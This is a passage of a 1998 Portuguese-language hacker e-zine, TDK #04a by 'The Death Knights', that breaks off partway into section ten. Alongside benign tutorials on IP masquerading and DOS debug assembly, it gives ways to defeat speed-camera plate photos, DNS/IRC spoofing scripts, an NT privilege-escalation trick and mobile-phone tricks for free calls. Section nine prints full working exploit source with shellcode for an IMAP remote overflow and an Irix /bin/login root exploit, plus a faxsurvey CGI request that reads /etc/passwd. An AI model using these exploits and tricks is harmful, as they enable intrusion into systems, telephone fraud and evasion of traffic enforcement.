T H E
$$P°"²$b ,gP°"²$b ,gP°""²$b ,gP°$$$$$$$$²$b ,g° ²$b
$$ $$ $$ $$ $$ $$ $$$$$$ $$ $$
$$ $$ $$ "² $$ $$ $$$$ $$ $$
$$ $$ $$P²" ,p $$, ,$$ `$$' $$, ,$$
$$ $$ gg $$ $$$$$$$$$ $$ $$$$$$$$$
$$ $$ $$ $$ $$' `$$ $$ $$' `$$
$$ $$ $$ $$ $$ $$ $$ $$ $$
$$ $$ $$ $$ $$ $$ .$$. $$ $$
T$, gP' T$, gP' $$ $$ $$$$ $$ $$
$$P²²°" $$P²²°" "² ²" $$$$ "² ²"
²" <Cacaio>
K N i G H T S
___________________________________TDK______________________________________
----------------------------------------------------------------------------
Data estelar: 1.0874929520
Data terrestre: 17/08/1998
TDK #04a
e-mail: tdk@DeathKnights.com
page: http://www.DeathKnights.com
melhor visualizado com joe -asis e terminal com setfont alt-8x16. (linux)
melhor visualizado com edit. (dos)
___________________________________TDK______________________________________
----------------------------------------------------------------------------
.-----------.
| SECOES \_______________________________________________________________
`----------------------------------------------------------------------------'
1 * ESCLARECiMENTOS Cacaio
2 * Radares Eletronicos Cacaio
-=[ ESPECIAL SPOOF ]=-
3 * Injection Spoof James007
4 * Como spoofar localmente Bloody Killer (BK)
-=[X]=-
5 * IP MASQUERADE red_evil (colaborador)
6 * Tutorial de asm! Hunter^Heads
7 * Mais sobre celulares REBOOT
8 * Admnistrador no NT ReNeGaDe
9 * Exploit - CGI & Stuff ReNeGaDe
10 * Maquinas de cold drinks Cacaio
11 * HTML DoS (simples d+) Cacaio
12 * VIRUS DE MACRO Milly
13 * A arte de matar Cacaio
--
14 * FEW WORDS Cacaio
-=[ 1 ]=-
.----------------.
| ESCLARECiMENTOS \__________________________________________________________
`----------------------------------------------------------------------------'
Nao nos responsabilizamos pela informacao contida neste zine. Se voce
usar indevidamente qualquer informacao contida aqui, a responsabilidade e' to-
da sua. Se for pego, preso ou sei la o que, nao nos perturbe.
Neste zine contamos com uma materia do nosso amigo red_evil, que nao
e' um membro dos The Death Knights, mas como nos mandou a materia e achamos
interessante, a publicaremos. Valeu mano!
Ah, eu ja tinha preparado a materia quanto aos radares eletronicos
quando a revista veja lancou uma materia parecida, mas nao e' por isso que
eu deixei de fora minha materia, esta neste zine.
Este grupo nao visa nenhum fim lucrativo. Nos fazemos isto por diver-
sao e nada mais.
Se voce nao gostou da informacao contida aqui, nao nos perturbe. O
problema e' todo seu.
-=[ 2 ]=-
.--------------------.
| Radares Eletronicos \______________________________________________________
`----------------------------------------------------------------------------'
by Cacaio
Voce esta' cansado de levar tanta multa por excesso de velocidade?
Quando estas multas vem dos Radares Eletronicos, os quais chamarei de
'pardais', elas so chegam a voce se voce bobear. Citarei dois metodos de a sua
placa nao ser identificada nas fotografias. Testem, realmente funcionam.
.------------------.
| Tinta Esmalte `--------------------------------------------.
`=================-=-====--==-=-=-===----==---=-=---=-=--- -- - -
Metodo simples, que para descobrir basta usar um pouco de logica.
Pinte sua placa com tinta esmalte nas cores PRETA para letras e
numeros, e a cor PRATA LUMINESCENTE para o fundo. Quando o flash
bate, esta tinta funciona como um espelho e o flash volta para a
lente. Na fotografia sai apenas um clarao no lugar da placa. Nao
acredita? Pegue um pedaco de metal, pinte com tinta esmalte como
a placa, e tire uma foto com flash. Agora revele e se surpreenda
com o resultado.
Funciona com todos os pardais.
.-----------------.
| Compact Disk `---------------------------------------------.
`=================-=-====--==-=-=-===----==---=-=---=-=--- -- - -
Voce pergunta: O que? Compact Disk? CD? Exatamente!!! Coloque um
CD no painel do carro na reta da placa, bem perto do capo, se os
pardais de sua cidade tirarem foto da frente do veiculo (o que e
o mais comum). Se o pardal tirar foto da parte traseira do carro
nao tem jeito. Mas o que o CD tem a ver com isso? E' o seguinte,
a foto que o pardal tira e' digital , e, como a lente e' a mesma
do CD player, vai procurar pelas faixas do CD. Na foto aparecera
um clarao na foto inteira, quase toda branca.
Funciona com pardais que operam em sistema digital.
Use esta informacao como quiser.
Cacaio Cacaio@DeathKnights.com
`'`'`' `'`'`'`'`'`'`'`'`'`'`'`
-=[ 3 ]=-
.------------------.
| Injection Spoof \________________________________________________________
`----------------------------------------------------------------------------'
by James007
Bem, eh a primeira vez que escrevo para a TDK, e resolvi escrever sobre esse
assunto, vamos dizer... interessante......
Vou comecar explicando como spoofar usando 2 maquinas ( mais seguro, pois
voce nao vai precisar deixar o named killado na maqina principal ;)
Primeiro, voce deve considerar que voce precisa de 2 maquinas em uma rede,
as duas sendo Linux ( nao pode ser outro UNIX ), sendo que uma precisa ser
NS primario com autoritative answer...
Comecando....
Vamos dizer que vc tenha root na maquina netgo3.netgo.com.br, que eh
NS primario com nameserver authotidative.. e que voce tenha root na
james007.netgo.com.br que *nao* eh nameserver.... vc vai na netgo3.netgo.com.br
e indica a james007.netgo.com.br no named sendo nameserver... exemplo:
netgo3 IN NS james007.netgo.com.br
ai vc killa o named dessa maquina ( netgo3.netgo.com.br ) e executa denovo.
Agora voce loga como root na james007.netgo.com.br e killa o named dela se
tiver rodando named.. ai.. vc vai mandar o injection.c ( q jah vem nessa
edicao da TDK ) para a james007.netgo.com.br e compile....
Depois de compilado, execute o injection com a seguinte sintaxe:
./injection senha > /dev/null 2> /dev/null &
Agora, voce vai pegar um shell script, q jah vem nessa edicao, chamado cache, e
vai editar ele...
Edite as seguintes linhas:
PASSWORD=senha
INJ_SERVER=maquina.que.roda.o.injection
SPOOF_SERVER=maquina.que.da.ns.ao.injection
No "PASSWORD=" coloque a senha que vc escolheu..
no "INJ_SERVER=" coloca a host da maquina q roda o injection
e no "SPOOF_SERVER=" voce coloca a host da maquina q da NS ao injection
agora tah prontinho..
O cache fica na sua maquina
ai vc executa ele assim:
cache seu-ip seu-ip-spoofado irc.servidor-onde-vc-quer-spoofar.com.br
e prontow..
;)
Agora vou explicar usando soh uma maquina, que no caso precisa ser
NS primario com authoridative answer..
Voce loga como root nessa maquina.... kille o named.. e execute o injection
com os mesmos parametros...
ai na hora de configurar o cache, vc coloca no INJ_SERVER e no SPOOF_SERVER
a mesma host.. e tah valendo..... ;)
Ai eh soh executa o cache na sua maquina da mesma forma.. simples naum?! ;)
soh tem um problema.. nao eh bom ficar killando o named, rodando o
injection, depois killar o injection, e rodar o named.... o root pode
perseber.. alem do mais.. pode dar pau nas hosts da provedora.. por isso....
tome cuidado com o q faz.... ;)
Eh isso ai... tah ai... pra mim eh a forma mais facil de spoofar...
eu particularmente nao gosto de programas to tipo jizz, e da familia.. ;)
Eh isso ai d00z! tah ai.. agora eh soh vc arranjar uma NS primario q tenha
authoridative answer e enjoy..
ah.. jah ia me eskecendo da lista de servers q da pra spoofar...
Vou colocar soh servers da brasirc.. nao vou falar nenhum da brasnet nem
rede brasil:
irc.eribeiro.com.br
irc.sercomtel.com.br
irc.summer.com.br
Eh.. tah bom. chega.. ;)
OBS: O injection.c e o script cache vem anexos a este zine.
James007 James@DeathKnights.com
`'`'`'`' `'`'`'`'`'`'`'`'`'`'`'
-=[ 4 ]=-
.--------------------------.
| Como spoofar localmente \________________________________________________
`----------------------------------------------------------------------------'
by BK
Hi d0oDz!
bom... pra criancada que sempre quis spoofar e nao tem shell pra isso,
e' simples .. basta seguir esses passos:
(no final colocarei um exemplo de tudo)
1-) Va na ml.org ou dyndns.com e crie um dominio dinamico pra voce
2-) Pegue o jizz (se vc nao achar nao tem problema.. to mandando junto
com a TDK).
3-) Configure e rode o named na sua maquina.
4-) Agora a parte mais dificil, consiga com alguem que tem shell ou
entao algum lugar que forneca NS free(procure q vc acha) e coloque
IN NS com seu dominio dinamico.
5-) Agora configure seu database (do named da sua maquina)
6-) Depois de tudo configurado e funcionando, kille seu named
e execute este script
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
#!/bin/sh
#Script por ][MoSCa][ - BrasNET
HOST=$RANDOM
NSDOMAIN=your.ns.org #domain we control
DEVICE=ppp0 #name of device we want to use
MEUIP=$1
if [ $# -ne '3' ]; then
echo "usage: $0 <Ip> <Spoof> <Irc Server>"
exit
fi
killall jizz
sleep 1
jizz $HOST.$NSDOMAIN $NSDOMAIN $MEUIP $NSDOMAIN $MEUIP $2 &
nslookup <<END > /dev/null 2> /dev/null
server $3
set q=soa
$HOST.$NSDOMAIN
exit
END
RESULT=`nslookup $MEUIP $3 | grep Name | cut -d ":" -f2`
echo
echo -= $RESULT IN A $MEUIP =-
echo
sleep 1
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Como usar:
bash# script <seu.ip> <seu.spoof> <irc.server>
(o jizz deve estar no mesmo diretorio q este script)
exemplo de database
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
@ IN SOA your.ns.org. root.your.ns.org. (
980131170 ; Serial
300 ; Refresh
120 ; Retry
660 ; Expire
600) ; TTL
IN NS seu.dominio-dinamico.org.
www IN A 200.200.200.200
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
no /etc/resolv.conf nao use 127.0.0.1 como nameserver pois apartir da hora
q vc killar o named nao vai resolver mais nada na sua maquina
entao coloque por exemplo:
domain convex.com.br
nameserver 200.210.55.241
tudo certo, so tentar.
PS: Irc Server com Vulnerabilidade no Bind (eu acho q ainda funciona)
BrasNET
irc.certto.com.br
BrasIRC
irc.eribeiro.com.br
bom, e' isso... se nao entendeu leia de novo, leia outros documentos ou
qualquer outra coisa, menos ficar me mandando PVT no IRC
cYa d0oDz!
Bloody Killer bk@deathknights.com
`'`'`'`'`'`'` `'`'`'`'`'`'`'`'`'`
-=[ 5 ]=-
.----------------.
| IP MASQUERADE \__________________________________________________________
`----------------------------------------------------------------------------'
by red_evil
O IP MASQUERADE e' um modo de conectar computadores `a internet , ou `a outra
rede, por intermedio de apenas um IP, um computador. A grosso modo, se voce
tem uma conexao dial-up, voce pode ligar a sua rede interna, a internet,
apenas usando o masquerade. Para implantar o IP MASQUERADE, o primeiro passo
e' ter um servidor rodando Linux, de preferencia a ultima versao, com o kernel
compilado, com o suporte a IP MASQUERADE ativado.
(CONFIG_IP_FORWARD=y>
O IP FORWARDING e' o recurso do kernel q permite o 'repasse' de pacotes entre
dispositivos, no caso, seu modem e sua interface de rede. Alem disso, voce
deve ter sua rede funcionando ok, com ips atribuidos, e bem definidos, e se
possivel um named rodando, para facilitar as coisas. Todos os computadores
deve estar devidamente inseridos na tabela de roteamento do kernel.
Obviamente, este nao e' o unico requisito para que o ip forwarding rode ok no
seu sistema.
Eu pessoalmente recomendo habilitar todas as opcoes relacionadas com ip,
exceto as relacionadas com ROUTING.
Com o IP Forwarding habilitado, o proximo passo e' pegar o ipfwadm, o
utilitario necessario para administrar este recurso.
Apos pegar este arquivo, descompactar LER O README, e coloca-lo no /sbin, voce
deve fazer um script para ativa-lo.
Este script esta' anexo ao zine (tdk04.zip).
Alem disso, voce deve setar nas outras maquinas o ip do seu computador
conectado, como gateway ( ou default) .. geralmente no linux eh route add
-host ip.do.micro, e depois route add default gw ip...algo assim ( qquer
duvida, man route ).
E pronto. E' so isso ! Obviamente, voce deve observar todas os procedimentos
para a seguranca do seu sistema, mas ai ja' e' outro texto.
.-------------------.
| Agradecimentos `-------------------------------------------.
`=================-=-====--==-=-=-===----==---=-=---=-=--- -- - -
Como sempre, sozinho nao da' pra fazer nada, o meu objetivo com esta materia
e' um modo pratico de por o masquerade funcionando, mas obviamente existe
muito mais que isso. Espero que com ele funcionando, a pessoa se anime a
procurar outros usos para ele, tal como firewall e muito mais.
Agradeco ao pmci ( icmp ) e ao |UnDeR| pelos toques importantissimos.
red_evil red_evil@uground.org
`'`'`'`' `'`'`'`'`'`'`'`'`'`'
-=[ 6 ]=-
.----------------------------.
| Tutorial de asm parte II! \______________________________________________
`----------------------------------------------------------------------------'
by Hunter^Heads
bom vamos , falar sobre programacao ?
kx.. tipo primeiramente bora aprender a mexer com o debug..
como criar um programa em debug :
* Desenvolvimento do algoritmo, estagio em que o problema a ser
solucionado B estabelecido e a melhor solucao e proposta, criacao de
diagramas esquematicos relativos E melhor solucao proposta.
* Codificacao do algoritmo, o que consiste em escrever o programa
em alguma linguagem de programacao; linguagem assembly neste caso
espec!fico, tomando como base a solucao proposta no passo anterior.
* A transformacao para a linguagem de m quina, ou seja, a criacao
do programa objeto, escrito como uma sequencia de zeros e uns que
podem ser interpretados pelo processador.
* O ultimo estagio e a eliminacao de erros detectados no programa
na fase de teste. A correcao normalmente requer a repeticao de todos
os passos, com observacao atenta.
bom os principais passos foram tomados.. agora bora brincar de registrador
da merda da sua maq.
Para o proposito didatico, vamos focar registradores de 16 bits. A CPU
possui 4 registradores internos, cada um de 16 bits. Sao eles AX, BX, CX e
DX. Sao registradores de uso geral e tambem podem ser usados como
registradores de 8 bits. Para tanto devemos referencia-los como, por
exemplo, AH e AL, que sao, respectivamente, o byte high e o low do
registrador AX. Esta nomenclatura tambem se aplica para os registradores
BX,M CX e DX.
ES Registrador de Segmento Extra
SS Registrador de Segmento de Pilha
CS Registrador de Segmento de Codigo
BP Registrador Apontador da Base
SI Registrador de indice Fonte
DI Registrador de indice Destino
SP Registrador Apontador de Pilha
IP Registrador Apontador da Prixima Instrucao
F Registrador de Flag
AX Registrador Acumulador
BX Registrador Base
CX Registrador Contador
DX Registrador de Dados
DS Registrador de Segmento de Dados
Para a criacao de um programa em assembler existem 2 opGdes: usar o TASM -M
Turbo Assembler da Borland, ou o DEBUGGER. Nesta primeira vamos usar
o debug, uma vez que podemos encontr -lo em qualquer PC com o MS-DOS.
Debug pode apenas criar arquivos com a extensao .COM, e por causa das
caracteristicas deste tipo de programa, eles nao podem exceder os 64 Kb, e
tambem devem iniciar no endereco de memoria 0100H dentro do segmento
especifico. E importante observar isso, pois deste modo os programas .COM
nao sao relocaveis.
.-----------------------------.
| principais comandos do debug `---------------------------------.
`=================-=-====--==-=-=-===----==---=-=---=-=--- -- - -
A Montar instrucoes simbolicas em codigo de maquina
D Mostrar o conteudo de uma area da memoria
E Entrar dados na memoria, iniciando num endereco especifico
G Rodar um programa executavel na memoria
N Dar nome a um programa
P Proceder, ou executar um conjunto de instrucoes relacionadas
Q Sair do programa debug -> este vc jah sabia? eaheha
R Mostrar o conteudo de um ou mais registradores
T Executar passo a passo as instrucoes
U Desmontar o codigo de m quina em instrucoes simbolicas
W Gravar um programa em disco
E possivel visualizar os valores dos registradores internos da CPU usando o
programa Debug. Debug e um programa que faz parte do pacote do DOS, e pode
ser encontrado normalmente no diretorio C:\DOS. Para inicia-lo, basta
digitar Debug na linha de comando:
M
C:#:)>Debug [Enter]
Voce notara entao a presenca de um hifen no canto inferior esquerdo da
tela.Nao se espante, este e o prompt do programa. Para visualizar o conteudo dosM
registradores, experimente:buuuuh
-r[Enter]
AX=0000 BX=0000 CX=0000 DX=0000 SP=FFEE BP=0000 SI=0000 DI=0000
DS=0D62 ES=0D62 SS=0D62 CS=0D62 IP=0100 NV UP EI PL NZ NA PO NC
0D62:0100 2E CS:
0D62:0101 803ED3DF00 CMP BYTE PTR [DFD3],00
CS:DFD3=03
E mostrado o conteudo de todos os registradores internos da CPU; um modo
alternativo para visualizar um unico registrador e usar o camando "r"
seguido do paremetro que faz referencia ao nome do registrador:
-rbx
BX 0000
:MC
Esta instrucao mostrar o conteudo do registrador BX e mudar o indicador
do Debug de "-" para ":"
Quando o prompt assim se tornar, significa que e poss!vel, embora nao
obrigatoria, a mudanca do valor contido no registrador, bastando digitar o
novo valor e pressionar [Enter]. Se voce simplesmente pressionar [Enter] o
valor antigo ira se manter.
.-------------------------.
| Estrutura Assembly `-------------------------------------.
`=================-=-====--==-=-=-===----==---=-=---=-=--- -- - -
Nas linhas do codigo em Linguagem Assembly e duas partes: a primeira e o
nome da instrucao a ser executada; a segunda, os parimetros do comando. Por
exemplo:
add ah bh
Aqui "add" B o comando a ser executado, neste caso uma adicao, e "ah" bem
como "bh" sao os parimetros.
Por exemplo:
mov al, 25
No exemplo acima, estamos usando a instrucao mov, que significa mover o
valor 25 para o registrador al.
M
O nome das instrucoes nesta linguagem e constitu!do de 2, 3 ou 4 letras.
Estas instrucoes sao chamadas codigos de operacao,representando a
funcao que o processador executar .
as vezes instrucoes aparecem assim:
add al,[170]
Os colchetes no segundo parimetro indica-nos que vamos trabalhar com o
conteudo da celula de memoria de numero 170, ou seja, com o valor contido
no endereco 170 da memoria e nao com o valor 170, isto e conhecido como
enderecamento direto.
O primeiro passo e iniciar o Debug, o que jah vimos como fazer
anteriormente.
Para montar um programa no Debug, e usado o comando "a" (assemble); quando
usamos este comando, podemos especificar um endereco inicial para o nosso
programa como o parimetro, mas e opcional. No caso de omissao, o endereco
inicial e o especificado pelos registradores CS:IP, geralmente 0100h, o
local em que programas com extensFo .COM devem iniciar. E ser este o local
que usaremos, uma vez que o Debug so pode criar este tipo de programa.
Embora neste momento nao seja necessario darmos um parimetro ao comando
"a", isso e recomendavel para evitar problemas, logo:
a 100[enter]
mov ax,0002[enter]
mov bx,0004[enter]
add ax,bx[enter]
nopA[enter][enter]
O que o programa faz? Move o valor 0002 para o registrador ax, move o valor
0004 para o registrador bx, adiciona o conteudo dos registradores ax e bx,
guardando o resultado em ax e finalmente a instrucao nop (nenhuma operacao)
finaliza o programa.
No programa debug, a tela se parecer com:
C:\>debug
-a 100
0D62:0100 mov ax,0002
0D62:0103 mov bx,0004
0D62:0106 add ax,bx
0D62:0108 nop
0D62:0109
Entramos com o comando "t" para executar passo a passo as instrucoes:
-t
AX=0002 BX=0000 CX=0000 DX=0000 SP=FFEE BP=0000 SI=0000 DI=0000
DS=0D62 ES=0D62 SS=0D62 CS=0D62 IP=0103 NV UP EI PL NZ NA PO NC
0D62:0103 BB0400 MOV BX,0004
Vemos o valor 0002 no registrador AX. Teclamos "t" para executar a segunda
instrucao:
-t
AX=0002 BX=0004 CX=0000 DX=0000 SP=FFEE BP=0000 SI=0000 DI=0000
DS=0D62 ES=0D62 SS=0D62 CS=0D62 IP=0106 NV UP EI PL NZ NA PO NC
0D62:0106 01D8 ADD AX,BX
Teclando "t" novamente para ver o resultado da instrucao add:
-t
AX=0006 BX=0004 CX=0000 DX=0000 SP=FFEE BP=0000 SI=0000 DI=0000
DS=0D62 ES=0D62 SS=0D62 CS=0D62 IP=0108 NV UP EI PL NZ NA PE NC
0D62:0108 90 NOP
A possibilidade dos registradores conterem valores diferentes existe, mas
AX e BX devem conter os mesmos valores acima descritos.
Para sair do Debug usamos o comando "q" (quit).
carregando / armazenando os bixinhos
Nao seria pratico ter que digitar o programa cada vez que iniciassemos o
Debug. Ao inves disso, podemos armazen -lo no disco. so que o mais
interessante nisso e que um simples comando de salvar cria um arquivo com a
extensao .COM, ou seja, executavel - sem precisarmos efetuar os processos
de montagem e ligacao, como veremos posteriormente com o TASM.
Eis os passos para salvar um programa que ja esteja na memoria:
* Obter o tamnho do programa subtraindo o endereco final do
endereco inicial, naturalmente que no sistema hexadecimal.
* Dar um nome ao programa.
* Colocar o tamanho do programa no registrador CX.
* Mandar o debug gravar o programa em disco.
Usando como exemplo o seguinte programa, vamos clarear a ideia de como
realizar os passos acima descritos:
0C1B:0100 mov ax,0002
0C1B:0103 mov bx,0004
0C1B:0106 add ax,bx
0C1B:0108 int 20
0C1B:010A
Para obter o tamanho de um programa, o comando "h" e usado, ja que ele nos
mostra a adicao e subtracao de dois numeros em hexadecimal. Para obter o
tamanho do programa em questao, damos como parimetro o valor do endereco
final do nosso programa (10A), e o endereGo inicial (100). O primeiro
resultado mostra-nos a soma dos enderecos, o segundo, a subtracao.
-h 10a 100
020a 000a
O comando "n" permite-nos nomear o programa.
-n test.com
O comando "rcx" permite-nos mudar o conteudo do registrador CX para o valor
obtido como tamanho do arquivo com o comando "h", neste caso 000a.
-rcx
CX 0000
:000a
Finalmente, o comando "w" grava nosso programa no disco, indicando quantos
bytes gravou.
-w
Writing 000A bytes
Para ja salvar um arquivo quando carreg -lo, 2 passos sao necessarios:
Dar o nome do arquivo a ser carregado.
Carrega-lo usando o comando "l" (load).
Para obter o resultado correto destes passos, e necessario que o programa
acima ja esteja criado.
Dentro do Debug, escrevemos o seguinte:
-n test.com
-l
-u 100 109
0C3D:0100 B80200 MOV AX,0002
0C3D:0103 BB0400 MOV BX,0004
0C3D:0106 01D8 ADD AX,BX
0C3D:0108 CD20 INT 20
O ultimo comando "u" e usado para verificar que o programa foi carregado na
memoria. O que ele faz e desmontar o codigo e mostra-lo em assembly. Os
parimetros indicam ao Debug os enderecos inicial e final a serem desmontados.
O Debug sempre carrega os programas na memoria no endereco 100h, conforme ja
comentamos.
Hunter^Heads HunterH@deathknights.com
`'`'`'`'`'`' `'`'`'`'`'`'`'`'`'`'`'`'
-=[ 7 ]=-
.-----------------------.
| Mais sobre celulares \___________________________________________________
`----------------------------------------------------------------------------'
by REBOOT
Ae pessoal, blz ?
Olha eu aki mais uma vez, agora falando um pouco sobre telefonia celular.
Bom, as duas dicas abaixo eu soh testei nos aparelhos da marca
MOTOROLA, pois eh a marca dos aparelhos q eu utilizo.
.--------------.
| 1a DICA `------------------------------------------------.
`=================-=-====--==-=-=-===----==---=-=---=-=--- -- - -
Quando voce faz a programacao para quando alguem ligar para o numero do
celular de um cara e essa ligacao chamar no teu aparelho utilizando:
FCN 0 00000000000 RCL
daih aparece o numero 01
agora eh soh pressionar a tecla ( * ) ateh aparecer o numero 03
ih logo em seguida aparecerah o numero do teu celular, dae
eh soh vc mudar pro numero dele ih pressionar a tecla ( * ) + SND
Vc soh pode fazer essa mudanca apenas 15x, apos isso o aparelho
deixa vc mudar o numero para o teu ou para outro (1 meio eh na TELE),
mas aki estah 1 metodo blz pra sempre zerar as 15 mudancas, ae vai:
FCN 0 0**83786633 #
32 # (ousa um som beim longo. pronto td resetado)
.--------------.
| 2a DICA `------------------------------------------------.
`=================-=-====--==-=-=-===----==---=-=---=-=--- -- - -
Para utilizar seu celular sem pagar ligacoes estah sendo muito
utilizado o seguinte metodo:
2345678 (exemplo do numero pra queim vc quer ligar)
RCL ***
Pronto, soh isso, num doe nada, principalmente no seu bolso.
Teh a proxima.
REBOOT reboot@deathknights.com
`'`'`' `'`'`'`'`'`'`'`'`'`'`'`
-=[ 8 ]=-
.----------------------.
| Administrador no NT \____________________________________________________
`----------------------------------------------------------------------------'
by ReNeGaDe
Hi All! Vamos lah para mais uma materia para mostrar aos provedores, que usam
o NT, diferente de qualquer workstation UNIX devidamente blindada e protegida
localmente. Assim podendo ser invadida por qualquer funcionario malz intencio-
nados do mesmo. Nao quero dizer que um sistema UNIX tambem nao pode ser invadi
do mais pelo menos nao facilmente assim.
Facilmente se chega a obter privilegios de Administrador no NT:
Um usuario normal tem acesso de escrita no diretorio winnt\system32
Ele muda o logon.scr para logon.old
Ele muda o usrmgr.exe (ou musrmgr.exe nas Workstations) para logon.scr
Ele da um shut down na maquina utilizando a opcao "close all programs
and log on as different user"
Aguarda...
O sistema vai iniciar o logon.scr...
User Manager vai ser carregado...
O usuario entao seleciona o seu dominio
Adiciona ele mesmo para o grupo de Adminstrador
Ele sai e loga de novo...
Possivel solucao:
Ter certeza que os usuarios so possuam acesso de leitura para o diretorio
winnt\system32.
Ter certeza que o registro tem as permissoes corretas para que o usuario
possa especificar um local diferente para o logon.scr
ReNeGaDe renegade@deathknights.com
`'`'`'`' `'`'`'`'`'`'`'`'`'`'`'`'`
-=[ 9 ]=-
.-----------------------.
| Exploits - CGI & Stuff \___________________________________________________
`----------------------------------------------------------------------------'
by ReNeGaDe
Mais uma para voces! Para tentar um exploit, e' melhor ter uma conta no seu
alvo(se possivel). Aqui irao alguns poucos exploits pra voce se divertir!
E tambem ah falha de cgi para get passwd do faxsurvey.
1) Exploit para novo bug do imap..
-------xX !!! CuT HeRe !!! !!! CuT HeRe !!! !!! CuT HeRe !!! Xx-------
/*
* Here goes another imap remote exploit
* The Death Knights www.deathknights.com
* by ReNeGaDe - ReNeGaDe@DeathKnights.com
*
* hey kiddies, it's 4 linux ! :)
* play around but be nice and careful - test it only against your own machine
* this code is only for educational purpose.
*
* renegade:~# (./imaprulez 100; cat) | nc victim.org 143
* (you can provide an offset or use the default 100)
*
* thanks for c0nd0r - condor@uground.org
*
* this code is heavly based on Cheez Whiz code
* So give him the credit : cheezbeast@hotmail.com
* I just found out the esp and fix things up
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <limits.h>
#include <string.h>
#define BUFLEN (2*1024)
#define NOP 0x90
char shell[] =
"\xeb\x34\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07"
"\x89\x56\x0f\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x7f"
"\x20\x46\x01\x20\x46\x02\x20\x46\x03\x20\x46\x05\x20\x46\x06"
"\xb0\x3b\x8d\x4e\x0b\x89\xca\x52\x51\x53\x50\xeb\x18\xe8\xc7\xff\xff\xff"
"\x2f\xe2\xe9\xee\x2f\xf3\xe8\x01\x01\x01\x01\x02\x02\x02\x02"
"\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";
char buf[BUFLEN];
unsigned long int nop, esp;
long int offset;
void
main (int argc, char *argv[])
{
int i;
nop = 403; offset = 100;
if (argc > 2) nop = atoi(argv[2]);
if (argc > 1) offset = atoi(argv[1]);
esp = 0xbffff501;
memset(buf, NOP, BUFLEN);
memcpy(buf+nop, shell, strlen(shell));
for (i = nop+strlen(shell); i < BUFLEN - 4; i += 4)
*((int *) &buf[i]) = esp + offset;
printf("* AUTHENTICATE {%d}\r\n", BUFLEN);
for (i = 0; i < BUFLEN; i++)
putchar(buf[i]);
printf("\r\n");
return;
}
-------xX !!! CuT HeRe !!! !!! CuT HeRe !!! !!! CuT HeRe !!! Xx-------
2) Um buffer overflow para voce! Em /bin/login. O que acontece usuarios locais
podem pegar root access. Sistemas vulneraveis Irix 5.3 Irix64 6.2 Irix 6.3.
Solucao temporaria: chmod u-s /bin/login
Compile o exploit usando '-n32' flag pra compiling under 6.x
-------xX !!! CuT HeRe !!! !!! CuT HeRe !!! !!! CuT HeRe !!! Xx-------
/* /bin/login exploit by DCRH 24/5/97
*
* The Death Knights www.deathknights.com
* by ReNeGaDe - ReNeGaDe@DeathKnights.com
*
* Tested on: R3000 Indigo (Irix 5.3)
* R4400 Indy (Irix 5.3)
* R5000 O2 (Irix 6.3)
* R8000 Power Challenge (Irix 6.2)
*
* Compile as: cc -n32 login.c (for Irix 6.x)
* cc login.c (for Irix 5.x)
*
* Press enter when prompted for a password
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>
#define BUF_LENGTH 200
#define EXTRA 300
#define OFFSET 0x1b0
#define IRIX_NOP 0x03e0f825 /* move $ra,$ra */
#define u_long unsigned
u_long get_sp_code[] = {
0x03a01025, /* move $v0,$sp */
0x03e00008, /* jr $ra */
0x00000000, /* nop */
};
u_long irix_shellcode[] = {
0x24041234, /* li $4,0x1234 */
0x2084edcc, /* sub $4,0x1234 */
0x0491fffe, /* bgezal $4,pc-4 */
0x03bd302a, /* sgt $6,$sp,$sp */
0x23e4012c, /* addi $4,$31,264+36 */
0xa086feff, /* sb $6,-264+7($4) */
0x2084fef8, /* sub $4,264 */
0x20850110, /* addi $5,$4,264+8 */
0xaca4fef8, /* sw $4,-264($5) */
0xaca6fefc, /* sw $4,-260($5) */
0x20a5fef8, /* sub $5, 264 */
0x240203f3, /* li $v0,1011 */
0x03ffffcc, /* syscall 0xfffff */
0x2f62696e, /* "/bin" */
0x2f7368ff, /* "/sh" */
};
char buf[BUF_LENGTH + EXTRA + 8];
void main(int argc, char **argv)
{
char *env[] = {NULL};
u_long targ_addr, stack;
u_long *long_p;
int i, code_length = strlen((char *)irix_shellcode)+1;
u_long (*get_sp)(void) = (u_long (*)(void))get_sp_code;
stack = get_sp();
long_p =(u_long *) buf;
targ_addr = stack + OFFSET;
if (argc > 1)
targ_addr += atoi(argv[1]);
while ((targ_addr & 0xff000000) == 0 ||
(targ_addr & 0x00ff0000) == 0 ||
(targ_addr & 0x0000ff00) == 0 ||
(targ_addr & 0x000000ff) == 0)
targ_addr += 4;
for (i = 0; i < (BUF_LENGTH - code_length) / sizeof(u_long); i++)
*long_p++ = IRIX_NOP;
for (i = 0; i < code_length/sizeof(u_long); i++)
*long_p++ = irix_shellcode[i];
for (i = 0; i < EXTRA / sizeof(u_long); i++)
*long_p++ = (targ_addr << 24) | (targ_addr >> 8);
*long_p = 0;
printf("stack = 0x%x, targ_addr = 0x%x\n", stack, targ_addr);
execle("/bin/login", "login", "-h", &buf[1], 0, env);
perror("execl failed");
}
-------xX !!! CuT HeRe !!! !!! CuT HeRe !!! !!! CuT HeRe !!! Xx-------
3) Falha de cgi no 'faxsurvey' CGI-Script...
"http://vitima.org/cgi-bin/faxsurvey?/bin/cat%20/etc/passwd"
Eh isso ae pessoal aqui se encerram minhas materias nessa TDK!
Se tiverem interesse em tirar duvidas ou apresentar novas
ideias, aqui estah o meu email. Mais sem babozeiras hein pessoal vamos
ter um bom senso pois nao sou desocupado.
cya l8er!
ReNeGaDe renegade@deathknights.com
`'`'`'`' `'`'`'`'`'`'`'`'`'`'`'`'`
-=[ 10 ]=-
.------------------------.
| Maquinas de cold drinks \__________________________________________________
`----------------------------------------------------------------------------'
by Cacaio
Ae bando de doido, esse texto foi originalmente escrito em frances por
Oliver Clothezoffe, e eu fiz a traducao e algumas modificacoes para que funcio
